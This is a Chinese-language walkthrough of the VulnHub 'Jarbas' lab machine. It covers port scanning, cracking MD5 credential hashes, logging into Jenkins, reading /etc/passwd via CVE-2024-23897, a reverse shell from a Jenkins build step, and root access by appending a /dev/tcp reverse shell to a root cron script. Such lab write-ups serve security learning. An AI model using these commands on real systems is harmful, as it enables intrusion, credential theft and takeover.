靶機連結
https://www.vulnhub.com/entry/jarbas-1,232/
主機發現埠掃描
-
掃描網段存活主機,因為主機是我最後新增的,所以靶機地址是
135
的nmap -sP 192.168.75.0/24 // Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-21 14:03 CST Nmap scan report for 192.168.75.1 Host is up (0.00032s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.75.2 Host is up (0.00036s latency). MAC Address: 00:50:56:FB:CA:45 (VMware) Nmap scan report for 192.168.75.135 Host is up (0.00032s latency). MAC Address: 00:0C:29:08:91:76 (VMware) Nmap scan report for 192.168.75.254 Host is up (0.00021s latency). MAC Address: 00:50:56:F8:B3:1A (VMware) Nmap scan report for 192.168.75.131 Host is up.
-
掃描主機開放埠,開放埠:
22,80,3306,8080
nmap -sT -min-rate 10000 -p- 192.168.75.135 // Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-21 14:05 CST Nmap scan report for 192.168.75.135 Host is up (0.00074s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql 8080/tcp open http-proxy MAC Address: 00:0C:29:08:91:76 (VMware)
-
掃描服務版本及系統版本
nmap -sT -sV -O -p22,80,3306,8080 192.168.75.135 // Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-21 14:07 CST Nmap scan report for 192.168.75.135 Host is up (0.00076s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) 3306/tcp open mysql MariaDB (unauthorized) 8080/tcp open http Jetty 9.4.z-SNAPSHOT MAC Address: 00:0C:29:08:91:76 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop
-
掃描漏洞,沒什麼值得注意的漏洞,不過發現了兩個資料夾
/icons/
和/robots.txt
map -script=vuln -p22,80,3306,8080 192.168.75.135 // Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-21 14:08 CST Nmap scan report for 192.168.75.135 Host is up (0.00032s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-trace: TRACE is enabled | http-enum: |_ /icons/: Potentially interesting folder w/ directory listing 3306/tcp open mysql 8080/tcp open http-proxy | http-enum: |_ /robots.txt: Robots file MAC Address: 00:0C:29:08:91:76 (VMware)
滲透優先順序 :
80,8080
→3306
→22
WEB滲透
80埠
-
掃描目錄
192.168.75.135:80
python .\dirsearch.py -u http://192.168.75.135/ // [14:12:53] 200 - 359B - /access.html [14:12:58] 403 - 210B - /cgi-bin/
-
發現
/access.html
,訪問發現是有用的資訊Creds encrypted in a safe way! <image> tiago:5978a63b4654c73c60fa24f836386d87 trindade:f463f63616cb3f1e81ce46b39f882fd5 eder:9b38e2b1e8b12f426b0d208a7ab6cb98
乍一看很像MD5,破解後得到以下內容,大概是一些賬號密碼,在哪裡使用暫時還不知道
tiago:italia99 trindade:marianna eder:vipsu
-
再檢視前面nmap掃描出來的
icons
目錄,發現沒什麼有用的資訊
8080埠
-
訪問
8080
埠,發現是登陸頁面,並且是Jenkins CMS
-
先訪問nmap掃描出來的
robots.txt
,獲得以下內容# we don't want robots to click "build" links User-agent: * Disallow: /
感覺也沒啥利用的
-
回到登陸頁面,嘗試使用之前獲得的使用者資訊登入
發現
eder:vipsu
可以登入進去 -
進入後臺,仔細挖掘一些有用的設定
Jenkins CLI , 指令碼命令列 , 系統資訊
等都是我們感興趣的進入
關於jenkins
,發現版本是2.113
漏洞利用
-
查閱資訊,發現存在任意檔案讀取 CVE-2024-23897,我們嘗試利用
https://blog.csdn.net/qq_34594929/article/details/136446671
-
進入
Jenkins CLI
,下載Jenkins-cli.jar
-
然後到
管理Jenkins
→全域性安全設定
→勾選匿名使用者具有可讀許可權
-
開啟kali命令列輸入,獲得
/etc/passwd
java -jar jenkins-cli.jar -s http://192.168.75.135:8080 connect-node '@/etc/passwd' // icked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin: No such agent "ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin" exists. systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin: No such agent "systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin" exists. daemon:x:2:2:daemon:/sbin:/sbin/nologin: No such agent "daemon:x:2:2:daemon:/sbin:/sbin/nologin" exists. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin: No such agent "lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin" exists. root:x:0:0:root:/root:/bin/bash: No such agent "root:x:0:0:root:/root:/bin/bash" exists. jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false: No such agent "jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false" exists. adm:x:3:4:adm:/var/adm:/sbin/nologin: No such agent "adm:x:3:4:adm:/var/adm:/sbin/nologin" exists. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown: No such agent "shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown" exists. sync:x:5:0:sync:/sbin:/bin/sync: No such agent "sync:x:5:0:sync:/sbin:/bin/sync" exists. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin: No such agent "mail:x:8:12:mail:/var/spool/mail:/sbin/nologin" exists. dbus:x:81:81:System message bus:/:/sbin/nologin: No such agent "dbus:x:81:81:System message bus:/:/sbin/nologin" exists. postfix:x:89:89::/var/spool/postfix:/sbin/nologin: No such agent "postfix:x:89:89::/var/spool/postfix:/sbin/nologin" exists. operator:x:11:0:operator:/root:/sbin/nologin: No such agent "operator:x:11:0:operator:/root:/sbin/nologin" exists. eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash: No such agent "eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash" exists. apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin: No such agent "apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin" exists. mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin: No such agent "mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin" exists. polkitd:x:999:997:User for polkitd:/:/sbin/nologin: No such agent "polkitd:x:999:997:User for polkitd:/:/sbin/nologin" exists. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin: No such agent "sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin" exists. halt:x:7:0:halt:/sbin:/sbin/halt: No such agent "halt:x:7:0:halt:/sbin:/sbin/halt" exists. nobody:x:99:99:Nobody:/:/sbin/nologin: No such agent "nobody:x:99:99:Nobody:/:/sbin/nologin" exists. games:x:12:100:games:/usr/games:/sbin/nologin: No such agent "games:x:12:100:games:/usr/games:/sbin/nologin" exists. chrony:x:998:996::/var/lib/chrony:/sbin/nologin: No such agent "chrony:x:998:996::/var/lib/chrony:/sbin/nologin" exists. bin:x:1:1:bin:/bin:/sbin/nologin: No such agent "bin:x:1:1:bin:/bin:/sbin/nologin" exists. ERROR: Error occurred while performing this command, see previous stderr output.
但是讀取不了
/etc/shadow
,不過我們發現/etc/passwd
裡面存在eder
使用者,和我們進入後臺的使用者名稱一樣,我們嘗試一下使用ssh
登入,登陸失敗,換條路子走
利用Jenkins後臺反彈shell
-
發現 新建任務裡面的構建一個自由風格的軟體專案裡面可以執行
shell
程式碼 -
輸入反彈shell程式碼儲存
-
kali開啟監聽
nc -lvp 1234 // listening on [any] 1234 ...
-
在Jenkins裡面點選構建,就會執行剛剛輸入的程式碼
-
成功獲得shell
nc -lvp 1234 listening on [any] 1234 ... 192.168.75.135: inverse host lookup failed: Unknown host connect to [192.168.75.131] from (UNKNOWN) [192.168.75.135] 54884 python -c "import pty;pty.spawn('/bin/bash')" // 獲得互動shell bash-4.2$ ls ls bash-4.2$
提權
-
檢視透過Jenkins後臺獲得的shell許可權
bash-4.2$ whoami jenkins // bash-4.2$ sudo -l We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. [sudo] password for jenkins: ^C //要密碼 // bash-4.2$ uname -a Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux // bash-4.2$ ls -l total 0 // bash-4.2$ dpkg -l bash: dpkg: command not found
許可權不高不低
-
嘗試檢視
crontab
是否有root
執行的自動化任務bash-4.2$ cat /etc/crontab cat /etc/crontab SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed */5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
檔案內容是:
bash-4.2$ cat /etc/script/CleaningScript.sh #!/bin/bash rm -rf /var/log/httpd/access_log.txt
存在一條每隔五分鐘 使用root許可權清理某些東西的自動化任務
-
我們可以嘗試追加反彈shell在該指令碼尾部,讓它使用root許可權來執行反彈shell程式碼
提權成功,獲得root許可權,並且讀取flag內容
bash-4.2$ echo "/bin/bash >& /dev/tcp/192.168.75.131/1235 0>&1" >> /etc/script/CleaningScript.sh // <& /dev/tcp/192.168.75.131/1235 0>&1" >> /etc/script/CleaningScript.sh
nc -lvp 1235 listening on [any] 1235 ... // 192.168.75.135: inverse host lookup failed: Unknown host connect to [192.168.75.131] from (UNKNOWN) [192.168.75.135] 58338 python -c "import pty;pty.spawn('/bin/bash')" [root@jarbas ~]# whoami whoami root [root@jarbas ~]# uname -a uname -a Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux [root@jarbas ~]# dpkg -l dpkg -l bash: dpkg: command not found [root@jarbas ~]# cat flag.txt //讀取flag cat flag.txt Hey! Congratulations! You got it! I always knew you could do it! This challenge was very easy, huh? =) Thanks for appreciating this machine. @tiagotvrs [root@jarbas ~]#